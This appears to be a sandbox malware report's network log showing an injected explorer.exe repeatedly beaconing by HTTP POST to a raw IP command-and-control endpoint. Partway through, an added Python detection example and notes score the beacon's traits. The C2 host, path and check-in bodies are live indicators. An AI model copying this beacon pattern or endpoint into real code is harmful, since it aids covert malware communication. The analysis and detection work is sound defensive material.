                                                Dec 16, 2024 15:29:10.254971981 CET4977180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:10.255320072 CET4977280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:10.375179052 CET804977262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:10.375272036 CET804977162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:10.375293970 CET4977280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:10.375334978 CET4977180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:10.375614882 CET4977280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:10.496038914 CET804977262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:11.643517971 CET804977262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:11.647684097 CET4977280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:13.161704063 CET4977280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:13.162120104 CET4977380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:13.282075882 CET804977362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:13.282166004 CET4977380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:13.282543898 CET4977380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:13.283113956 CET804977262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:13.283174992 CET4977280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:13.403111935 CET804977362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:14.553715944 CET804977362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:14.555622101 CET4977380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:16.177164078 CET4977380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:16.177292109 CET4977480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:16.297158003 CET804977462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:16.297473907 CET804977362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:16.297575951 CET4977480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:16.297662020 CET4977380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:16.298041105 CET4977480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:16.417920113 CET804977462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:17.565325975 CET804977462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:17.565382004 CET4977480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:19.083830118 CET4977480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:19.084151030 CET4977580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:19.204093933 CET804977462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:19.204122066 CET804977562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:19.204165936 CET4977480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:19.204231977 CET4977580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:19.204518080 CET4977580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:19.324448109 CET804977562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:20.475075006 CET804977562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:20.475157022 CET4977580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:22.098994017 CET4977580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:22.099589109 CET4977680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:22.219849110 CET804977562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:22.219870090 CET804977662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:22.220180988 CET4977680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:22.220184088 CET4977580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:22.220531940 CET4977680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:22.340590000 CET804977662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:23.497365952 CET804977662.60.226.15192.168.2.10
                                                • 62.60.226.15
Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.10 | 49714       | 62.60.226.15   | 80               | 2972 | C:\Windows\SysWOW64\explorer.exe

Timestamp                           | Bytes transferred | Direction | Data
Dec 16, 2024 15:26:43.954461098 CET | 155               | OUT       | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:26:45.224833965 CET | 219               | IN        | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:26:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.10 | 49715       | 62.60.226.15   | 80               | 2972 | C:\Windows\SysWOW64\explorer.exe

Timestamp                           | Bytes transferred | Direction | Data
Dec 16, 2024 15:26:46.858215094 CET | 305               | OUT       | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:26:48.353238106 CET | 196               | IN        | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:26:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.10 | 49717       | 62.60.226.15   | 80               | 2972 | C:\Windows\SysWOW64\explorer.exe

Timestamp                           | Bytes transferred | Direction | Data
Dec 16, 2024 15:26:50.092807055 CET | 155               | OUT       | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Dec 16, 2024 15:26:51.362000942 CET | 219               | IN        | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:26:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.10 | 49719       | 62.60.226.15   | 80               | 2972 | C:\Windows\SysWOW64\explorer.exe

Timestamp                           | Bytes transferred | Direction | Data
Dec 16, 2024 15:26:52.998887062 CET | 305               | OUT       | POST /8fj482jd9/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.60.226.15
Content-Length: 152
Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
Dec 16, 2024 15:26:54.291321993 CET | 196               | IN        | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 16 Dec 2024 14:26:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.10 | 49721 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:26:56.047297001 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:26:57.320094109 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:26:57 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0
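The two request shapes above (a 152-byte `r=<hex>` body answered with a chunked ` <c><d>`, then a 4-byte `st=s` body) repeat every few seconds from an injected explorer.exe for the rest of this section. The following is an added example, not code from the report or from the sandbox vendor: it rebuilds a handful of these sessions from the data the report shows (timestamps truncated to microseconds; the hex blob copied verbatim but treated as opaque, since the report does not decode it) and runs the checks a detection engineer would apply to such a stream: single raw-IP endpoint, no User-Agent, regular interval with low jitter, alternating body types, and the `<c><d>` acknowledgement on every check-in. The jitter threshold and the decision to treat `<c><d>` as an acknowledgement marker are assumptions made for the example.

```python
"""Beacon-shape check over HTTP transactions of the form shown in this report.

Added example. SAMPLE_SESSIONS is constructed from the report's sessions 3..8
(same host, path, bodies, process and timestamps, truncated to microseconds);
it is not a live capture.
"""
import re
import statistics
from datetime import datetime

CRLF = b"\r\n"
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
PROC = r"C:\Windows\SysWOW64\explorer.exe"

# The 150 hex characters the report shows after "r=" (opaque here; not decoded).
CHECKIN_BLOB = ("3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872"
                "D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491")


def http_request(body: str) -> bytes:
    """Rebuild the request as the report shows it: form POST, raw-IP Host, no User-Agent."""
    head = (f"POST /8fj482jd9/index.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            f"Host: 62.60.226.15\r\nContent-Length: {len(body)}\r\nCache-Control: no-cache\r\n\r\n")
    return head.encode() + body.encode()


def http_response(chunked_body: bytes) -> bytes:
    head = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.24.0 (Ubuntu)\r\nContent-Type: text/html; charset=UTF-8\r\n"
            b"Transfer-Encoding: chunked\r\nConnection: keep-alive\r\n\r\n")
    return head + chunked_body


# (timestamp, originating image, request bytes, response bytes) -- constructed from the report
SAMPLE_SESSIONS = [
    ("2024-12-16 15:26:52.998887", PROC, http_request("r=" + CHECKIN_BLOB), http_response(b"7\r\n <c><d>\r\n0\r\n\r\n")),
    ("2024-12-16 15:26:56.047297", PROC, http_request("st=s"), http_response(b"1\r\n \r\n0\r\n\r\n")),
    ("2024-12-16 15:26:59.122020", PROC, http_request("r=" + CHECKIN_BLOB), http_response(b"7\r\n <c><d>\r\n0\r\n\r\n")),
    ("2024-12-16 15:27:02.139483", PROC, http_request("st=s"), http_response(b"1\r\n \r\n0\r\n\r\n")),
    ("2024-12-16 15:27:05.123493", PROC, http_request("r=" + CHECKIN_BLOB), http_response(b"7\r\n <c><d>\r\n0\r\n\r\n")),
    ("2024-12-16 15:27:08.249468", PROC, http_request("st=s"), http_response(b"1\r\n \r\n0\r\n\r\n")),
]


def parse_http(raw: bytes):
    """Split an HTTP/1.1 message into (start line, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("ascii", "replace").partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].decode("ascii", "replace"), headers, body


def dechunk(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body; '7\\r\\n <c><d>\\r\\n0\\r\\n\\r\\n' -> b' <c><d>'."""
    out, pos = b"", 0
    while True:
        end = body.index(CRLF, pos)
        size = int(body[pos:end].split(b";")[0].decode("ascii"), 16)
        if size == 0:
            return out
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2  # skip the chunk data and its trailing CRLF


def classify_body(body: bytes) -> str:
    """'st=s' -> status; 'r=' followed by an even-length hex string -> checkin; else other."""
    text = body.decode("ascii", "replace")
    if text == "st=s":
        return "status"
    if text.startswith("r=") and HEX_RE.match(text[2:]) and len(text[2:]) % 2 == 0:
        return "checkin"
    return "other"


def beacon_stats(timestamps):
    """Median gap between consecutive requests and the spread (max - min) of those gaps."""
    ts = [datetime.strptime(t, "%Y-%m-%d %H:%M:%S.%f") for t in timestamps]
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    return statistics.median(gaps), max(gaps) - min(gaps)


def analyze(sessions):
    types, endpoints, hosts, ua_missing, acks = [], set(), set(), 0, 0
    for _, _, req, resp in sessions:
        start, hdrs, body = parse_http(req)
        method, path, _ = start.split(" ", 2)
        endpoints.add((method, path))
        hosts.add(hdrs.get("host", ""))
        ua_missing += "user-agent" not in hdrs
        kind = classify_body(body)
        types.append(kind)
        _, rhdrs, rbody = parse_http(resp)
        if rhdrs.get("transfer-encoding", "").lower() == "chunked":
            rbody = dechunk(rbody)
        acks += kind == "checkin" and b"<c><d>" in rbody  # assumed acknowledgement marker
    median, jitter = beacon_stats([s[0] for s in sessions])
    f = {
        "single_endpoint": len(endpoints) == 1 and len(hosts) == 1,
        "raw_ip_host": all(IPV4_RE.match(h) for h in hosts),
        "no_user_agent": ua_missing == len(sessions),
        "alternating_bodies": types == ["checkin", "status"] * (len(types) // 2),
        "checkin_ack_marker": acks == types.count("checkin"),
        "explorer_originated": all(s[1].lower().endswith("\\explorer.exe") for s in sessions),
        "median_interval_s": round(median, 3),
        "jitter_s": round(jitter, 3),
        "body_types": types,
    }
    f["beacon_like"] = (f["single_endpoint"] and f["raw_ip_host"] and f["no_user_agent"]
                        and f["explorer_originated"] and f["jitter_s"] < 1.0)  # 1 s threshold is an assumption
    return f


if __name__ == "__main__":
    print(analyze(SAMPLE_SESSIONS))
```

On the sample above the median gap comes out at about 3.05 s with roughly 0.14 s of spread, which is why a fixed-interval check catches it even though each individual request looks like an ordinary form POST. Two points worth keeping in mind when turning this into a rule: a Windows shell process normally runs as C:\Windows\explorer.exe, so a 32-bit C:\Windows\SysWOW64\explorer.exe image making outbound HTTP is itself a strong signal, and a real implant can add jitter or a User-Agent, so the interval and header checks should be scored, not required.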


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.10 | 49724 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:26:59.122020006 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:00.400932074 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.10 | 49726 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:02.139483929 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:03.413563013 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:03 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.10 | 49729 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:05.123493910 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:06.394505024 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.10 | 49730 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:08.249468088 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:09.527472019 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:09 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.10 | 49731 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:11.172192097 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:12.442954063 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:12 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.10 | 49732 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:14.186387062 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:15.474734068 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:15 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.10 | 49733 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:17.108700991 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:18.378388882 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:18 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.10 | 49735 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:20.123505116 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:21.397772074 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:21 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                13 | 192.168.2.10 | 49736 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:23.032721996 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:24.316565037 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:24 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.2.10 | 49737 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:26.249377966 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:27.406558990 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:27 GMT
                                                Content-Type: text/html; charset=UTF-8
